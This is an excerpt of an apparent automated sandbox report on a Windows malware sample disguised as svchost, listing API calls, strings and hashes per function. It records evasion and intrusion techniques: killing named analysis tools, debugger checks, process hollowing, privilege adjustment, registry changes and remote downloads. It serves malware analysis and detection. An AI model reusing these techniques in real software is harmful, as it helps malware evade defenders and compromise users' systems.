                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction ID: 4fdced95383a57ac55d12e27afe95ec88d3bf100efd3725822349d713ae0b837
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 3EF0546190C24681EFB067556C24379A794BF59F04F844176D58D85594CF3CED05DB32

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                  • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                  • Instruction ID: 38de4d05bd51f37cfddc8f89d8b6af7f5991f24882226d5ab15533cf611d4343
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                  • Instruction Fuzzy Hash: 02F0EC74C0C649D2DBA47B20E85537DA368FB59B00FA40232D54EC2650CF3CD0058631

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                    • Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF7E52B3376
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
                                                                                                                                                                    • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$CreateProcess$CloseFileHandleOpenToken$AdjustAttributesCurrentDirectoryFolderLookupPathPrivilegePrivilegesThreadValue
                                                                                                                                                                  • String ID: .x64
                                                                                                                                                                  • API String ID: 3156018730-2481150777
                                                                                                                                                                  • Opcode ID: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                  • Instruction ID: 5caf0dfe925e994e27af1fdcf07abfc97f68b44c98acf041ba3a3a07d89b7c0f
                                                                                                                                                                  • Opcode Fuzzy Hash: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                  • Instruction Fuzzy Hash: C701DBA1E1854A81EE94FB14FC653B5A679AF98B04FC58533D40DC2196CE3CE145C763

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 418 7ff7e52b1050-7ff7e52b108c LoadLibraryA GetProcAddress
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction ID: 797435ddb680424ebbc96c2ef9b9917cb678864f7979cf6a571397b3ccc79694
                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction Fuzzy Hash: DBE09276508F8486CA60AB15F85011EB7B4FBC8B94F944526EACD82B28DF3CC165CB00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 419 7ff7e52b3b24-7ff7e52b3b33 420 7ff7e52b3b35-7ff7e52b3b42 VirtualFree 419->420 421 7ff7e52b3b48-7ff7e52b3b4c 419->421 420->421
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction ID: 5b047fbe46b6ce5d9f51d02e9ba33a8e1ff88cf3c86a7bcb6f101778fef8bbcb
                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction Fuzzy Hash: 7FD01261E3894581EBD5AB26EC99719E3A4FBD8F44FC4C036E68A81568CF3CD0998F11
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction ID: af8e1d7dd572e00a3e9885ed2d59cf6c6c00ae16a050c4d2f9aca983e9266a1d
                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction Fuzzy Hash: 9432FA7261CBC586EBB5DB15E8647AAB3A5FBC8B40F804136DA8D83B58DF3CD4448B11
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7E52B1D19
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction ID: 939b8382344564756b92c14c89de0f08a0c4e38c2040c5ce4046036d76f00fc2
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D71FBB651CA4586EB909B54F86432AF764FBC8B95F501036FA8E83A68CF7CD444CB11
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7E52B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B460C
                                                                                                                                                                    • Part of subcall function 00007FF7E52B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4649
                                                                                                                                                                    • Part of subcall function 00007FF7E52B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4654
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B311C), ref: 00007FF7E52B3BC7
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7E52B3BFD
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7E52B3C0C
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7E52B3C3C
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E52B3E37
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: Process32FirstW.KERNEL32 ref: 00007FF7E52B3E6A
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3E7C
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: wcscmp.MSVCRT ref: 00007FF7E52B3E91
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: OpenProcess.KERNEL32 ref: 00007FF7E52B3EA7
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: TerminateProcess.KERNEL32 ref: 00007FF7E52B3ECA
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3ED8
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: Process32NextW.KERNEL32 ref: 00007FF7E52B3EEB
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3EFD
                                                                                                                                                                    • Part of subcall function 00007FF7E52B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7E52B3B0C), ref: 00007FF7E52B39E4
                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF7E52B31C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction ID: 999d87fb475b494b90df3869ec926774e7e48570c3f5560f715b54259dfee72f
                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction Fuzzy Hash: AA217BE0A5894A50EA94F720DC713B4E268BF68F50FD44533E45DC21E6DE3DB9098633
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction ID: 0642ba919600f8b9de3ccd814af6d60c2ab0057cfdc30560ee2d7f126bc5bdd1
                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C01006290CA0581EB74AB11EC64369A778FBCCF94F880232D94ED2674CF3CE5858622
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction ID: 6e480685bd25d188cc00c66421aafef3bbb85132ae6c9baca588b683f5c412bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction Fuzzy Hash: 47212771A0C98981EBB0AB15EC6836AE368FFD8F54F844336C55E825A8DF3DD445CB11
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction ID: 2a2f7665fd8fecca6a8832b5106b166b0431a5aa711fb25a7b15295ea6cdc311
                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction Fuzzy Hash: E901DE6691CA4582EB64AB21EC6436DA378FBCCF45F840536E98ED2674CF3CD5448622
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction ID: a0e41d55a6a38c7a220cbc19af8769bd302f0d948737d3e432776235a3dd0fca
                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction Fuzzy Hash: BA31D97261CAC585DBB0EB19E8987AAB3A4F798B40F404136DA8DC3B68DF3DD154CB11
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
                                                                                                                                                                    • Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                    • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
